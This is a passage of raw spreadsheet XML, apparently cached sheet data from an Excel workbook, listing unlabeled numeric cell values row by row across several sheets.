          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.8669323671498</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>121.81</v>
          </cell>
          <cell r="S107">
            <v>2607.24</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>46.1401515151515</v>
          </cell>
          <cell r="V107">
            <v>31.4884057971014</v>
          </cell>
          <cell r="W107">
            <v>124.852071005917</v>
          </cell>
          <cell r="X107">
            <v>125.65470815204</v>
          </cell>
          <cell r="Y107">
            <v>131.638054034151</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.83</v>
          </cell>
          <cell r="R108">
            <v>125.32</v>
          </cell>
          <cell r="S108">
            <v>2322.17</v>
          </cell>
          <cell r="T108">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U108">
            <v>47.469696969697</v>
          </cell>
          <cell r="V108">
            <v>28.0455314009661</v>
          </cell>
          <cell r="W108">
            <v>137.193575655114</v>
          </cell>
          <cell r="X108">
            <v>131.279923396106</v>
          </cell>
          <cell r="Y108">
            <v>127.632343885245</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>0</v>
          </cell>
          <cell r="R109">
            <v>88.16</v>
          </cell>
          <cell r="S109">
            <v>2883.74999999999</v>
          </cell>
          <cell r="T109">
            <v>0</v>
          </cell>
          <cell r="U109">
            <v>33.3939393939394</v>
          </cell>
          <cell r="V109">
            <v>34.8278985507246</v>
          </cell>
          <cell r="W109">
            <v>0</v>
          </cell>
          <cell r="X109">
            <v>272.595281306715</v>
          </cell>
          <cell r="Y109">
            <v>271.352232336368</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>9.67</v>
          </cell>
          <cell r="R110">
            <v>73.17</v>
          </cell>
          <cell r="S110">
            <v>2837.23</v>
          </cell>
          <cell r="T110">
            <v>40.2916666666667</v>
          </cell>
          <cell r="U110">
            <v>27.7159090909091</v>
          </cell>
          <cell r="V110">
            <v>34.2660628019323</v>
          </cell>
          <cell r="W110">
            <v>214.374353671148</v>
          </cell>
          <cell r="X110">
            <v>258.275249419161</v>
          </cell>
          <cell r="Y110">
            <v>268.57815545444</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="14">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7482.91</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>172455.102</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>7246</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8652.22</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>68928.83</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>341.5</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>13311.36</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>4121</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5504.2</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>41959.16</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1444.1</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>10188.59</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>3125</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1362.42</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>3469.72</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>44.02</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>319</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1169.746</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>2024.91</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>80.196875</v>
          </cell>
          <cell r="V101">
            <v>65.2009393063584</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.2629937379576</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>80.196875</v>
          </cell>
          <cell r="V104">
            <v>64.9207249518304</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.7690510597303</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>133.64</v>
          </cell>
          <cell r="S107">
            <v>2619.07</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>46.4027777777778</v>
          </cell>
          <cell r="V107">
            <v>31.5398603082851</v>
          </cell>
          <cell r="W107">
            <v>135.164835164835</v>
          </cell>
          <cell r="X107">
            <v>126.496557916791</v>
          </cell>
          <cell r="Y107">
            <v>131.653984047773</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.33</v>
          </cell>
          <cell r="R108">
            <v>136.65</v>
          </cell>
          <cell r="S108">
            <v>2333.5</v>
          </cell>
          <cell r="T108">
            <v>47.2083333333333</v>
          </cell>
          <cell r="U108">
            <v>47.4479166666667</v>
          </cell>
          <cell r="V108">
            <v>28.1009152215799</v>
          </cell>
          <cell r="W108">
            <v>134.68667255075</v>
          </cell>
          <cell r="X108">
            <v>131.562385656787</v>
          </cell>
          <cell r="Y108">
            <v>127.666595243197</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>0</v>
          </cell>
          <cell r="R109">
            <v>88.16</v>
          </cell>
          <cell r="S109">
            <v>2883.74999999999</v>
          </cell>
          <cell r="T109">
            <v>0</v>
          </cell>
          <cell r="U109">
            <v>30.6111111111111</v>
          </cell>
          <cell r="V109">
            <v>34.727239884393</v>
          </cell>
          <cell r="W109">
            <v>0</v>
          </cell>
          <cell r="X109">
            <v>272.595281306715</v>
          </cell>
          <cell r="Y109">
            <v>271.352232336368</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>16.83</v>
          </cell>
          <cell r="R110">
            <v>90</v>
          </cell>
          <cell r="S110">
            <v>2854.06</v>
          </cell>
          <cell r="T110">
            <v>70.125</v>
          </cell>
          <cell r="U110">
            <v>31.25</v>
          </cell>
          <cell r="V110">
            <v>34.3697013487475</v>
          </cell>
          <cell r="W110">
            <v>244.86036838978</v>
          </cell>
          <cell r="X110">
            <v>255.766666666667</v>
          </cell>
          <cell r="Y110">
            <v>268.438294920219</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="15">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6070.71</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>166384.392</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>5366</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>6616.28</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>67678.55</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>444.7</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>12866.66</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>2363</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>3406.08</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>40916.08</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1307.66</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>8880.93</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>3003</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1457.84</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>5014.88</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>177.82</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>230</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1117.566</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>2007.71</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>74.0278846153846</v>
          </cell>
          <cell r="V101">
            <v>65.0130403458213</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.1642531219981</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>74.0278846153846</v>
          </cell>
          <cell r="V104">
            <v>64.7336335254563</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.6717339097022</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>145.47</v>
          </cell>
          <cell r="S107">
            <v>2630.9</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>46.625</v>
          </cell>
          <cell r="V107">
            <v>31.591018251681</v>
          </cell>
          <cell r="W107">
            <v>123.837700760778</v>
          </cell>
          <cell r="X107">
            <v>126.280332714649</v>
          </cell>
          <cell r="Y107">
            <v>131.618837660117</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.83</v>
          </cell>
          <cell r="R108">
            <v>148.48</v>
          </cell>
          <cell r="S108">
            <v>2345.33</v>
          </cell>
          <cell r="T108">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U108">
            <v>47.5897435897436</v>
          </cell>
          <cell r="V108">
            <v>28.1619836695485</v>
          </cell>
          <cell r="W108">
            <v>130.008453085376</v>
          </cell>
          <cell r="X108">
            <v>131.438577586207</v>
          </cell>
          <cell r="Y108">
            <v>127.678407729403</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>0</v>
          </cell>
          <cell r="R109">
            <v>88.16</v>
          </cell>
          <cell r="S109">
            <v>2883.74999999999</v>
          </cell>
          <cell r="T109">
            <v>0</v>
          </cell>
          <cell r="U109">
            <v>28.2564102564103</v>
          </cell>
          <cell r="V109">
            <v>34.6271613832852</v>
          </cell>
          <cell r="W109">
            <v>0</v>
          </cell>
          <cell r="X109">
            <v>272.595281306715</v>
          </cell>
          <cell r="Y109">
            <v>271.352232336368</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>9.33</v>
          </cell>
          <cell r="R110">
            <v>99.33</v>
          </cell>
          <cell r="S110">
            <v>2863.39</v>
          </cell>
          <cell r="T110">
            <v>38.875</v>
          </cell>
          <cell r="U110">
            <v>31.8365384615385</v>
          </cell>
          <cell r="V110">
            <v>34.3826849183477</v>
          </cell>
          <cell r="W110">
            <v>253.269024651661</v>
          </cell>
          <cell r="X110">
            <v>255.53206483439</v>
          </cell>
          <cell r="Y110">
            <v>268.388867740685</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="16">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5658.11</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>160726.282</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>6726</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8486.2</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>65918.35</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>472.5</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>12394.16</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>3084</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4736.46</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>39263.62</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>485</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1436.12</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>7929.81</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>3157</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1841.12</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>6330.76</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>228.34</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>279</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1066.906</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>720.11</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>68.7401785714286</v>
          </cell>
          <cell r="V101">
            <v>64.8262212643678</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.0660799808429</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>68.7401785714286</v>
          </cell>
          <cell r="V104">
            <v>64.5476173371647</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.5749760536399</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>157.3</v>
          </cell>
          <cell r="S107">
            <v>2642.73</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>46.8154761904762</v>
          </cell>
          <cell r="V107">
            <v>31.641882183908</v>
          </cell>
          <cell r="W107">
            <v>127.303465765004</v>
          </cell>
          <cell r="X107">
            <v>126.357279084552</v>
          </cell>
          <cell r="Y107">
            <v>131.599520193134</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.67</v>
          </cell>
          <cell r="R108">
            <v>160.15</v>
          </cell>
          <cell r="S108">
            <v>2357</v>
          </cell>
          <cell r="T108">
            <v>48.625</v>
          </cell>
          <cell r="U108">
            <v>47.6636904761905</v>
          </cell>
          <cell r="V108">
            <v>28.220785440613</v>
          </cell>
          <cell r="W108">
            <v>141.473864610111</v>
          </cell>
          <cell r="X108">
            <v>132.169840774274</v>
          </cell>
          <cell r="Y108">
            <v>127.746711921935</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>1.67</v>
          </cell>
          <cell r="R109">
            <v>89.83</v>
          </cell>
          <cell r="S109">
            <v>2885.42</v>
          </cell>
          <cell r="T109">
            <v>6.95833333333333</v>
          </cell>
          <cell r="U109">
            <v>26.7351190476191</v>
          </cell>
          <cell r="V109">
            <v>34.5476532567049</v>
          </cell>
          <cell r="W109">
            <v>290.419161676647</v>
          </cell>
          <cell r="X109">
            <v>272.926639207392</v>
          </cell>
          <cell r="Y109">
            <v>271.363267739186</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>11.67</v>
          </cell>
          <cell r="R110">
            <v>111</v>
          </cell>
          <cell r="S110">
            <v>2875.06</v>
          </cell>
          <cell r="T110">
            <v>48.625</v>
          </cell>
          <cell r="U110">
            <v>33.0357142857143</v>
          </cell>
          <cell r="V110">
            <v>34.4236111111111</v>
          </cell>
          <cell r="W110">
            <v>264.26735218509</v>
          </cell>
          <cell r="X110">
            <v>256.45045045045</v>
          </cell>
          <cell r="Y110">
            <v>268.372138320592</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="17">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7807.58</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>152918.702</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>9612</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8564.66</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>66965.69</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>391.86</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>12002.3</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>3224</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5098.3</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>37389.32</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>3681</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1845.2</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>9765.61</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>2707</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1229.3</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>7808.46</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>273.54</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>374</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>966.446</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1257.58</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>64.1575</v>
          </cell>
          <cell r="V101">
            <v>64.6404727793696</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.9684694364852</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>64.1575</v>
          </cell>
          <cell r="V104">
            <v>64.3626671442216</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
